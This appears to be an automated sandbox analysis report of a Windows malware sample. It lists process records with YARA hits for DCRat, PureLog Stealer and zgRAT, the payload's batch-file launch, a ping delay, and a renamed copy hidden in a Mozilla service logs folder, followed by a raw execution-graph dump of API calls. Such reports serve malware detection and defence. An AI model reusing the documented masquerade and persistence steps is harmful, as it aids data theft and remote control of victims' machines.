                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\PortCommon\jweBRAt.bat" "
                                                                    Imagebase:0x790000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:22:27:19
                                                                    Start date:05/03/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:22:27:19
                                                                    Start date:05/03/2024
                                                                    Path:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\PortCommon/hyperbrokerhostNetsvc.exe
                                                                    Imagebase:0xc40000
                                                                    File size:5'964'288 bytes
                                                                    MD5 hash:6BB2A8990AE25FE86B233C31D6CB93BC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.2263404724.0000000000C42000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2308672698.0000000013281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 88%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:8
                                                                    Start time:22:27:23
                                                                    Start date:05/03/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Uhg5bQrQMo.bat"
                                                                    Imagebase:0x7ff65b050000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:9
                                                                    Start time:22:27:23
                                                                    Start date:05/03/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:10
                                                                    Start time:22:27:23
                                                                    Start date:05/03/2024
                                                                    Path:C:\Windows\System32\chcp.com
                                                                    Wow64 process (32bit):false
                                                                    Commandline:chcp 65001
                                                                    Imagebase:0x7ff78afa0000
                                                                    File size:14'848 bytes
                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:11
                                                                    Start time:22:27:23
                                                                    Start date:05/03/2024
                                                                    Path:C:\Windows\System32\PING.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:ping -n 10 localhost
                                                                    Imagebase:0x7ff71f7b0000
                                                                    File size:22'528 bytes
                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:12
                                                                    Start time:22:27:34
                                                                    Start date:05/03/2024
                                                                    Path:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\mozilla maintenance service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe"
                                                                    Imagebase:0x5b0000
                                                                    File size:5'964'288 bytes
                                                                    MD5 hash:6BB2A8990AE25FE86B233C31D6CB93BC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3259059706.00000000055E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3259059706.0000000005929000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 88%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:9.8%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:10.2%
                                                                      Total number of Nodes:1503
                                                                      Total number of Limit Nodes:32
                                                                      execution_graph 23474 7c9f7a 23475 7c9f8f 23474->23475 23476 7c9f88 23474->23476 23477 7c9f9c GetStdHandle 23475->23477 23484 7c9fab 23475->23484 23477->23484 23478 7ca003 WriteFile 23478->23484 23479 7c9fcf 23480 7c9fd4 WriteFile 23479->23480 23479->23484 23480->23479 23480->23484 23482 7ca095 23486 7c6e98 77 API calls 23482->23486 23484->23476 23484->23478 23484->23479 23484->23480 23484->23482 23485 7c6baa 78 API calls 23484->23485 23485->23484 23486->23476 23487 7c9a74 23490 7c9a7e 23487->23490 23488 7c9b9d SetFilePointer 23489 7c9bb6 GetLastError 23488->23489 23493 7c9ab1 23488->23493 23489->23493 23490->23488 23492 7c9b79 23490->23492 23490->23493 23494 7c981a 23490->23494 23492->23488 23495 7c9833 23494->23495 23498 7c9e80 23495->23498 23499 7c9ea5 23498->23499 23500 7c9e92 23498->23500 23501 7c9865 23499->23501 23503 7c9eb8 SetFilePointer 23499->23503 23500->23501 23507 7c6d5b 77 API calls 23500->23507 23501->23492 23503->23501 23504 7c9ed4 GetLastError 23503->23504 23504->23501 23505 7c9ede 23504->23505 23505->23501 23508 7c6d5b 77 API calls 23505->23508 23507->23499 23508->23501 25400 7c1075 84 API calls 25401 7da070 10 API calls 25403 7db270 99 API calls 25451 7c1f72 128 API calls __EH_prolog 25452 7e7f6e 52 API calls 2 library calls 23567 7de569 23568 7de517 23567->23568 23568->23567 23570 7de85d 23568->23570 23596 7de5bb 23570->23596 23572 7de86d 23573 7de8ca 23572->23573 23590 7de8ee 23572->23590 23574 7de7fb DloadReleaseSectionWriteAccess 6 API calls 23573->23574 23575 7de8d5 RaiseException 23574->23575 23591 7deac3 23575->23591 23576 7de966 LoadLibraryExA 23577 7de979 GetLastError 23576->23577 23578 7de9c7 23576->23578 23581 7de98c 23577->23581 23582 7de9a2 23577->23582 23579 7de9d9 23578->23579 23580 7de9d2 FreeLibrary 23578->23580 23583 7dea37 GetProcAddress 23579->23583 23584 7dea95 23579->23584 23580->23579 23581->23578 23581->23582 23586 7de7fb DloadReleaseSectionWriteAccess 6 API calls 23582->23586 23583->23584 23585 7dea47 GetLastError 23583->23585 23605 7de7fb 23584->23605 23588 7dea5a 23585->23588 23587 7de9ad RaiseException 23586->23587 23587->23591 23588->23584 23592 7de7fb DloadReleaseSectionWriteAccess 6 API calls 23588->23592 23590->23576 23590->23578 23590->23579 23590->23584 23591->23568 23593 7dea7b RaiseException 23592->23593 23594 7de5bb ___delayLoadHelper2@8 6 API calls 23593->23594 23595 7dea92 23594->23595 23595->23584 23597 7de5ed 23596->23597 23598 7de5c7 23596->23598 23597->23572 23613 7de664 23598->23613 23600 7de5cc 23601 7de5e8 23600->23601 23616 7de78d 23600->23616 23621 7de5ee GetModuleHandleW GetProcAddress GetProcAddress 23601->23621 23604 7de836 23604->23572 23606 7de80d 23605->23606 23607 7de82f 23605->23607 23608 7de664 DloadReleaseSectionWriteAccess 3 API calls 23606->23608 23607->23591 23609 7de812 23608->23609 23610 7de82a 23609->23610 23612 7de78d DloadProtectSection 3 API calls 23609->23612 23624 7de831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23610->23624 23612->23610 23622 7de5ee GetModuleHandleW GetProcAddress GetProcAddress 23613->23622 23615 7de669 23615->23600 23617 7de7a2 DloadProtectSection 23616->23617 23618 7de7a8 23617->23618 23619 7de7dd VirtualProtect 23617->23619 23623 7de6a3 VirtualQuery GetSystemInfo 23617->23623 23618->23601 23619->23618 23621->23604 23622->23615 23623->23619 23624->23607 23625 7e8268 23636 7ebb30 23625->23636 23630 7e8285 23632 7e8dcc _free 20 API calls 23630->23632 23633 7e82ba 23632->23633 23634 7e8290 23653 7e8dcc 23634->23653 23637 7e827a 23636->23637 23638 7ebb39 23636->23638 23640 7ebf30 GetEnvironmentStringsW 23637->23640 23659 7eba27 23638->23659 23641 7ebf47 23640->23641 23651 7ebf9a 23640->23651 23644 7ebf4d WideCharToMultiByte 23641->23644 23642 7e827f 23642->23630 23652 7e82c0 26 API calls 3 library calls 23642->23652 23643 7ebfa3 FreeEnvironmentStringsW 23643->23642 23645 7ebf69 23644->23645 23644->23651 23646 7e8e06 __vsnwprintf_l 21 API calls 23645->23646 23647 7ebf6f 23646->23647 23648 7ebf76 WideCharToMultiByte 23647->23648 23649 7ebf8c 23647->23649 23648->23649 23650 7e8dcc _free 20 API calls 23649->23650 23650->23651 23651->23642 23651->23643 23652->23634 23654 7e8dd7 RtlFreeHeap 23653->23654 23658 7e8e00 _free 23653->23658 23655 7e8dec 23654->23655 23654->23658 23824 7e91a8 20 API calls _abort 23655->23824 23657 7e8df2 GetLastError 23657->23658 23658->23630 23679 7e97e5 GetLastError 23659->23679 23661 7eba34 23700 7ebb4e 23661->23700 23663 7eba3c 23709 7eb7bb 23663->23709 23668 7eba96 23670 7e8dcc _free 20 API calls 23668->23670 23672 7eba53 23670->23672 23672->23637 23673 7eba91 23733 7e91a8 20 API calls _abort 23673->23733 23675 7ebada 23675->23668 23734 7eb691 26 API calls 23675->23734 23676 7ebaae 23676->23675 23677 7e8dcc _free 20 API calls 23676->23677 23677->23675 23680 7e97fb 23679->23680 23681 7e9807 23679->23681 23735 7eae5b 11 API calls 2 library calls 23680->23735 23736 7eb136 20 API calls 2 library calls 23681->23736 23684 7e9801 23684->23681 23686 7e9850 SetLastError 23684->23686 23685 7e9813 23687 7e981b 23685->23687 23737 7eaeb1 11 API calls 2 library calls 23685->23737 23686->23661 23689 7e8dcc _free 20 API calls 23687->23689 23691 7e9821 23689->23691 23690 7e9830 23690->23687 23692 7e9837 23690->23692 23693 7e985c SetLastError 23691->23693 23738 7e9649 20 API calls _abort 23692->23738 23739 7e8d24 38 API calls _abort 23693->23739 23696 7e9842 23698 7e8dcc _free 20 API calls 23696->23698 23699 7e9849 23698->23699 23699->23686 23699->23693 23701 7ebb5a __FrameHandler3::FrameUnwindToState 23700->23701 23702 7e97e5 _abort 38 API calls 23701->23702 23704 7ebb64 23702->23704 23707 7ebbe8 _abort 23704->23707 23708 7e8dcc _free 20 API calls 23704->23708 23740 7e8d24 38 API calls _abort 23704->23740 23741 7eac31 EnterCriticalSection 23704->23741 23742 7ebbdf LeaveCriticalSection _abort 23704->23742 23707->23663 23708->23704 23743 7e4636 23709->23743 23712 7eb7ee 23714 7eb805 23712->23714 23715 7eb7f3 GetACP 23712->23715 23713 7eb7dc GetOEMCP 23713->23714 23714->23672 23716 7e8e06 23714->23716 23715->23714 23717 7e8e44 23716->23717 23721 7e8e14 _abort 23716->23721 23754 7e91a8 20 API calls _abort 23717->23754 23718 7e8e2f RtlAllocateHeap 23720 7e8e42 23718->23720 23718->23721 23720->23668 23723 7ebbf0 23720->23723 23721->23717 23721->23718 23753 7e7a5e 7 API calls 2 library calls 23721->23753 23724 7eb7bb 40 API calls 23723->23724 23725 7ebc0f 23724->23725 23728 7ebc60 IsValidCodePage 23725->23728 23730 7ebc16 23725->23730 23731 7ebc85 _abort 23725->23731 23726 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23727 7eba89 23726->23727 23727->23673 23727->23676 23729 7ebc72 GetCPInfo 23728->23729 23728->23730 23729->23730 23729->23731 23730->23726 23755 7eb893 GetCPInfo 23731->23755 23733->23668 23734->23668 23735->23684 23736->23685 23737->23690 23738->23696 23741->23704 23742->23704 23744 7e4653 23743->23744 23750 7e4649 23743->23750 23745 7e97e5 _abort 38 API calls 23744->23745 23744->23750 23746 7e4674 23745->23746 23751 7e993a 38 API calls __fassign 23746->23751 23748 7e468d 23752 7e9967 38 API calls __fassign 23748->23752 23750->23712 23750->23713 23751->23748 23752->23750 23753->23721 23754->23720 23756 7eb977 23755->23756 23757 7eb8cd 23755->23757 23760 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23756->23760 23765 7ec988 23757->23765 23762 7eba23 23760->23762 23762->23730 23764 7eab78 __vsnwprintf_l 43 API calls 23764->23756 23766 7e4636 __fassign 38 API calls 23765->23766 23767 7ec9a8 MultiByteToWideChar 23766->23767 23769 7ec9e6 23767->23769 23777 7eca7e 23767->23777 23771 7e8e06 __vsnwprintf_l 21 API calls 23769->23771 23775 7eca07 _abort __vsnwprintf_l 23769->23775 23770 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23772 7eb92e 23770->23772 23771->23775 23779 7eab78 23772->23779 23773 7eca78 23784 7eabc3 20 API calls _free 23773->23784 23775->23773 23776 7eca4c MultiByteToWideChar 23775->23776 23776->23773 23778 7eca68 GetStringTypeW 23776->23778 23777->23770 23778->23773 23780 7e4636 __fassign 38 API calls 23779->23780 23781 7eab8b 23780->23781 23785 7ea95b 23781->23785 23784->23777 23786 7ea976 __vsnwprintf_l 23785->23786 23787 7ea99c MultiByteToWideChar 23786->23787 23788 7ea9c6 23787->23788 23789 7eab50 23787->23789 23792 7e8e06 __vsnwprintf_l 21 API calls 23788->23792 23795 7ea9e7 __vsnwprintf_l 23788->23795 23790 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23789->23790 23791 7eab63 23790->23791 23791->23764 23792->23795 23793 7eaa9c 23821 7eabc3 20 API calls _free 23793->23821 23794 7eaa30 MultiByteToWideChar 23794->23793 23796 7eaa49 23794->23796 23795->23793 23795->23794 23812 7eaf6c 23796->23812 23800 7eaaab 23804 7e8e06 __vsnwprintf_l 21 API calls 23800->23804 23805 7eaacc __vsnwprintf_l 23800->23805 23801 7eaa73 23801->23793 23802 7eaf6c __vsnwprintf_l 11 API calls 23801->23802 23802->23793 23803 7eab41 23820 7eabc3 20 API calls _free 23803->23820 23804->23805 23805->23803 23806 7eaf6c __vsnwprintf_l 11 API calls 23805->23806 23808 7eab20 23806->23808 23808->23803 23809 7eab2f WideCharToMultiByte 23808->23809 23809->23803 23810 7eab6f 23809->23810 23822 7eabc3 20 API calls _free 23810->23822 23813 7eac98 _abort 5 API calls 23812->23813 23814 7eaf93 23813->23814 23815 7eaf9c 23814->23815 23823 7eaff4 10 API calls 3 library calls 23814->23823 23818 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23815->23818 23817 7eafdc LCMapStringW 23817->23815 23819 7eaa60 23818->23819 23819->23793 23819->23800 23819->23801 23820->23793 23821->23789 23822->23793 23823->23817 23824->23657 25404 7dc793 107 API calls 5 library calls 24829 7dcd58 24830 7dce22 24829->24830 24837 7dcd7b _wcschr 24829->24837 24845 7dc793 _wcslen _wcsrchr 24830->24845 24857 7dd78f 24830->24857 24831 7db314 ExpandEnvironmentStringsW 24831->24845 24833 7dd40a 24834 7d1fbb CompareStringW 24834->24837 24836 7dca67 SetWindowTextW 24836->24845 24837->24830 24837->24834 24840 7e3e3e 22 API calls 24840->24845 24842 7dc855 SetFileAttributesW 24844 7dc90f GetFileAttributesW 24842->24844 24855 7dc86f _abort _wcslen 24842->24855 24844->24845 24847 7dc921 DeleteFileW 24844->24847 24845->24831 24845->24833 24845->24836 24845->24840 24845->24842 24848 7dcc31 GetDlgItem SetWindowTextW SendMessageW 24845->24848 24851 7dcc71 SendMessageW 24845->24851 24856 7d1fbb CompareStringW 24845->24856 24879 7da64d GetCurrentDirectoryW 24845->24879 24881 7ca5d1 6 API calls 24845->24881 24882 7ca55a FindClose 24845->24882 24883 7db48e 76 API calls 2 library calls 24845->24883 24847->24845 24849 7dc932 24847->24849 24848->24845 24850 7c4092 _swprintf 51 API calls 24849->24850 24852 7dc952 GetFileAttributesW 24850->24852 24851->24845 24852->24849 24853 7dc967 MoveFileW 24852->24853 24853->24845 24854 7dc97f MoveFileExW 24853->24854 24854->24845 24855->24844 24855->24845 24880 7cb991 51 API calls 3 library calls 24855->24880 24856->24845 24859 7dd799 _abort _wcslen 24857->24859 24858 7dd9e7 24858->24845 24859->24858 24860 7dd9c0 24859->24860 24861 7dd8a5 24859->24861 24884 7d1fbb CompareStringW 24859->24884 24860->24858 24865 7dd9de ShowWindow 24860->24865 24863 7ca231 3 API calls 24861->24863 24864 7dd8ba 24863->24864 24867 7dd8d1 24864->24867 24885 7cb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24864->24885 24865->24858 24867->24858 24868 7dd925 24867->24868 24869 7dd97b CloseHandle 24867->24869 24874 7dd91b ShowWindow 24867->24874 24886 7ddc3b 6 API calls 24868->24886 24870 7dd989 24869->24870 24871 7dd994 24869->24871 24887 7d1fbb CompareStringW 24870->24887 24871->24860 24874->24868 24875 7dd93d 24875->24869 24876 7dd950 GetExitCodeProcess 24875->24876 24876->24869 24877 7dd963 24876->24877 24877->24869 24879->24845 24880->24855 24881->24845 24882->24845 24883->24845 24884->24861 24885->24867 24886->24875 24887->24871 25406 7de455 14 API calls ___delayLoadHelper2@8 25409 7da440 GdipCloneImage GdipAlloc 25410 7e3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25456 7f1f40 CloseHandle 25458 7df530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25459 7dff30 LocalFree 25412 7ec030 GetProcessHeap 25413 7c1025 29 API calls 25414 7dc220 93 API calls _swprintf 25416 7ef421 21 API calls __vsnwprintf_l 25463 7c1710 86 API calls 25464 7dad10 73 API calls 25419 7da400 GdipDisposeImage GdipFree 25420 7dd600 70 API calls 25421 7e6000 QueryPerformanceFrequency QueryPerformanceCounter 25423 7ef200 51 API calls 25466 7e2900 6 API calls 4 library calls 25468 7ea700 21 API calls 25424 7e2cfb 38 API calls 4 library calls 25426 7c5ef0 82 API calls 25469 7c95f0 80 API calls 25470 7dfd4f 9 API calls 2 library calls 23510 7e98f0 23518 7eadaf 23510->23518 23513 7e9904 23515 7e990c 23516 7e9919 23515->23516 23526 7e9920 11 API calls 23515->23526 23527 7eac98 23518->23527 23521 7eadee TlsAlloc 23522 7eaddf 23521->23522 23534 7dfbbc 23522->23534 23524 7e98fa 23524->23513 23525 7e9869 20 API calls 2 library calls 23524->23525 23525->23515 23526->23513 23528 7eacc8 23527->23528 23530 7eacc4 23527->23530 23528->23521 23528->23522 23530->23528 23532 7eace8 23530->23532 23541 7ead34 23530->23541 23531 7eacf4 GetProcAddress 23533 7ead04 _abort 23531->23533 23532->23528 23532->23531 23533->23528 23535 7dfbc5 IsProcessorFeaturePresent 23534->23535 23536 7dfbc4 23534->23536 23538 7dfc07 23535->23538 23536->23524 23548 7dfbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23538->23548 23540 7dfcea 23540->23524 23542 7ead55 LoadLibraryExW 23541->23542 23546 7ead4a 23541->23546 23543 7ead72 GetLastError 23542->23543 23547 7ead8a 23542->23547 23544 7ead7d LoadLibraryExW 23543->23544 23543->23547 23544->23547 23545 7eada1 FreeLibrary 23545->23546 23546->23530 23547->23545 23547->23546 23548->23540 23550 7eabf0 23551 7eabfb 23550->23551 23553 7eac24 23551->23553 23554 7eac20 23551->23554 23556 7eaf0a 23551->23556 23563 7eac50 DeleteCriticalSection 23553->23563 23557 7eac98 _abort 5 API calls 23556->23557 23558 7eaf31 23557->23558 23559 7eaf4f InitializeCriticalSectionAndSpinCount 23558->23559 23560 7eaf3a 23558->23560 23559->23560 23561 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23560->23561 23562 7eaf66 23561->23562 23562->23551 23563->23554 25427 7e88f0 7 API calls ___scrt_uninitialize_crt 25473 7cf1e8 FreeLibrary 23826 7deae7 23827 7deaf1 23826->23827 23828 7de85d ___delayLoadHelper2@8 14 API calls 23827->23828 23829 7deafe 23828->23829 25428 7df4e7 29 API calls _abort 23830 7db7e0 23831 7db7ea __EH_prolog 23830->23831 23996 7c1316 23831->23996 23834 7dbf0f 24075 7dd69e 23834->24075 23835 7db82a 23837 7db841 23835->23837 23839 7db838 23835->23839 23845 7db89b 23835->23845 23840 7db83c 23839->23840 23841 7db878 23839->23841 23840->23837 23850 7ce617 53 API calls 23840->23850 23841->23837 23852 7db95f KiUserCallbackDispatcher 23841->23852 23842 7dbf38 23846 7dbf41 SendDlgItemMessageW 23842->23846 23847 7dbf52 GetDlgItem SendMessageW 23842->23847 23843 7dbf2a SendMessageW 23843->23842 23844 7db92e GetDlgItemTextW 23844->23841 23848 7db96b 23844->23848 23845->23844 23849 7db8b1 23845->23849 23846->23847 24093 7da64d GetCurrentDirectoryW 23847->24093 23853 7db974 23848->23853 23854 7db980 GetDlgItem 23848->23854 23855 7ce617 53 API calls 23849->23855 23856 7db85b 23850->23856 23852->23837 23853->23841 23867 7dbe55 23853->23867 23858 7db994 SendMessageW SendMessageW 23854->23858 23859 7db9b7 SetFocus 23854->23859 23860 7db8ce SetDlgItemTextW 23855->23860 24113 7c124f SHGetMalloc 23856->24113 23857 7dbf82 GetDlgItem 23864 7dbf9f 23857->23864 23865 7dbfa5 SetWindowTextW 23857->23865 23858->23859 23861 7db9c7 23859->23861 23875 7db9e0 23859->23875 23862 7db8d9 23860->23862 23866 7ce617 53 API calls 23861->23866 23862->23837 23869 7db8e6 GetMessageW 23862->23869 23864->23865 24094 7dabab GetClassNameW 23865->24094 23870 7db9d1 23866->23870 23871 7ce617 53 API calls 23867->23871 23869->23837 23873 7db8fd IsDialogMessageW 23869->23873 24114 7dd4d4 23870->24114 23877 7dbe65 SetDlgItemTextW 23871->23877 23873->23862 23879 7db90c TranslateMessage DispatchMessageW 23873->23879 23882 7ce617 53 API calls 23875->23882 23876 7dc1fc SetDlgItemTextW 23876->23837 23880 7dbe79 23877->23880 23879->23862 23883 7ce617 53 API calls 23880->23883 23885 7dba17 23882->23885 23918 7dbe9c _wcslen 23883->23918 23884 7dbff0 23889 7dc020 23884->23889 23892 7ce617 53 API calls 23884->23892 23890 7c4092 _swprintf 51 API calls 23885->23890 23886 7db9d9 24006 7ca0b1 23886->24006 23888 7dc73f 97 API calls 23888->23884 23898 7dc73f 97 API calls 23889->23898 23942 7dc0d8 23889->23942 23893 7dba29 23890->23893 23897 7dc003 SetDlgItemTextW 23892->23897 23899 7dd4d4 16 API calls 23893->23899 23894 7dc18b 23900 7dc19d 23894->23900 23901 7dc194 EnableWindow 23894->23901 23895 7dba68 GetLastError 23896 7dba73 23895->23896 24012 7dac04 SetCurrentDirectoryW 23896->24012 23903 7ce617 53 API calls 23897->23903 23905 7dc03b 23898->23905 23899->23886 23906 7dc1ba 23900->23906 24132 7c12d3 GetDlgItem EnableWindow 23900->24132 23901->23900 23902 7dbeed 23909 7ce617 53 API calls 23902->23909 23907 7dc017 SetDlgItemTextW 23903->23907 23915 7dc04d 23905->23915 23939 7dc072 23905->23939 23912 7dc1e1 23906->23912 23923 7dc1d9 SendMessageW 23906->23923 23907->23889 23908 7dba87 23913 7dba9e 23908->23913 23914 7dba90 GetLastError 23908->23914 23909->23837 23910 7dc0cb 23919 7dc73f 97 API calls 23910->23919 23912->23837 23926 7ce617 53 API calls 23912->23926 23920 7dbb11 23913->23920 23924 7dbaae GetTickCount 23913->23924 23925 7dbb20 23913->23925 23914->23913 24130 7d9ed5 32 API calls 23915->24130 23917 7dc1b0 24133 7c12d3 GetDlgItem EnableWindow 23917->24133 23918->23902 23927 7ce617 53 API calls 23918->23927 23919->23942 23920->23925 23928 7dbd56 23920->23928 23921 7dc066 23921->23939 23923->23912 24013 7c4092 23924->24013 23933 7dbcfb 23925->23933 23934 7dbb39 GetModuleFileNameW 23925->23934 23935 7dbcf1 23925->23935 23931 7db862 23926->23931 23932 7dbed0 23927->23932 24031 7c12f1 GetDlgItem ShowWindow 23928->24031 23931->23837 23931->23876 23943 7c4092 _swprintf 51 API calls 23932->23943 23938 7ce617 53 API calls 23933->23938 24124 7cf28c 82 API calls 23934->24124 23935->23841 23935->23933 23936 7dc169 24131 7d9ed5 32 API calls 23936->24131 23947 7dbd05 23938->23947 23939->23910 23948 7dc73f 97 API calls 23939->23948 23940 7dbd66 24032 7c12f1 GetDlgItem ShowWindow 23940->24032 23941 7dbac7 24016 7c966e 23941->24016 23942->23894 23942->23936 23950 7ce617 53 API calls 23942->23950 23943->23902 23945 7dbb5f 23951 7c4092 _swprintf 51 API calls 23945->23951 23946 7dc188 23946->23894 23952 7c4092 _swprintf 51 API calls 23947->23952 23953 7dc0a0 23948->23953 23950->23942 23955 7dbb81 CreateFileMappingW 23951->23955 23956 7dbd23 23952->23956 23953->23910 23957 7dc0a9 DialogBoxParamW 23953->23957 23954 7dbd70 24033 7ce617 23954->24033 23960 7dbbe3 GetCommandLineW 23955->23960 23990 7dbc60 __InternalCxxFrameHandler 23955->23990 23968 7ce617 53 API calls 23956->23968 23957->23841 23957->23910 23963 7dbbf4 23960->23963 23962 7dbaed 23965 7dbaf4 GetLastError 23962->23965 23966 7dbaff 23962->23966 24125 7db425 SHGetMalloc 23963->24125 23965->23966 24024 7c959a 23966->24024 23972 7dbd3d 23968->23972 23969 7dbd8c SetDlgItemTextW GetDlgItem 23973 7dbda9 GetWindowLongW SetWindowLongW 23969->23973 23974 7dbdc1 23969->23974 23971 7dbc10 24126 7db425 SHGetMalloc 23971->24126 23973->23974 24038 7dc73f 23974->24038 23977 7dbc1c 24127 7db425 SHGetMalloc 23977->24127 23980 7dc73f 97 API calls 23982 7dbddd 23980->23982 23981 7dbc28 24128 7cf3fa 82 API calls 2 library calls 23981->24128 24063 7dda52 23982->24063 23984 7dbccb 23984->23935 23988 7dbce1 UnmapViewOfFile CloseHandle 23984->23988 23986 7dbc3f MapViewOfFile 23986->23990 23988->23935 23989 7dc73f 97 API calls 23994 7dbe03 23989->23994 23990->23984 23992 7dbcb7 Sleep 23990->23992 23991 7dbe2c 24129 7c12d3 GetDlgItem EnableWindow 23991->24129 23992->23984 23992->23990 23994->23991 23995 7dc73f 97 API calls 23994->23995 23995->23991 23997 7c131f 23996->23997 23998 7c1378 23996->23998 23999 7c1385 23997->23999 24134 7ce2e8 62 API calls 2 library calls 23997->24134 24135 7ce2c1 GetWindowLongW SetWindowLongW 23998->24135 23999->23834 23999->23835 23999->23837 24002 7c1341 24002->23999 24003 7c1354 GetDlgItem 24002->24003 24003->23999 24004 7c1364 24003->24004 24004->23999 24005 7c136a SetWindowTextW 24004->24005 24005->23999 24009 7ca0bb 24006->24009 24007 7ca14c 24008 7ca2b2 8 API calls 24007->24008 24010 7ca175 24007->24010 24008->24010 24009->24007 24009->24010 24136 7ca2b2 24009->24136 24010->23895 24010->23896 24012->23908 24174 7c4065 24013->24174 24017 7c9678 24016->24017 24018 7c96d5 CreateFileW 24017->24018 24019 7c96c9 24017->24019 24018->24019 24020 7c971f 24019->24020 24021 7cbb03 GetCurrentDirectoryW 24019->24021 24020->23962 24022 7c9704 24021->24022 24022->24020 24023 7c9708 CreateFileW 24022->24023 24023->24020 24025 7c95be 24024->24025 24026 7c95cf 24024->24026 24025->24026 24027 7c95ca 24025->24027 24028 7c95d1 24025->24028 24026->23920 24203 7c974e 24027->24203 24208 7c9620 24028->24208 24031->23940 24032->23954 24034 7ce627 24033->24034 24223 7ce648 24034->24223 24037 7c12f1 GetDlgItem 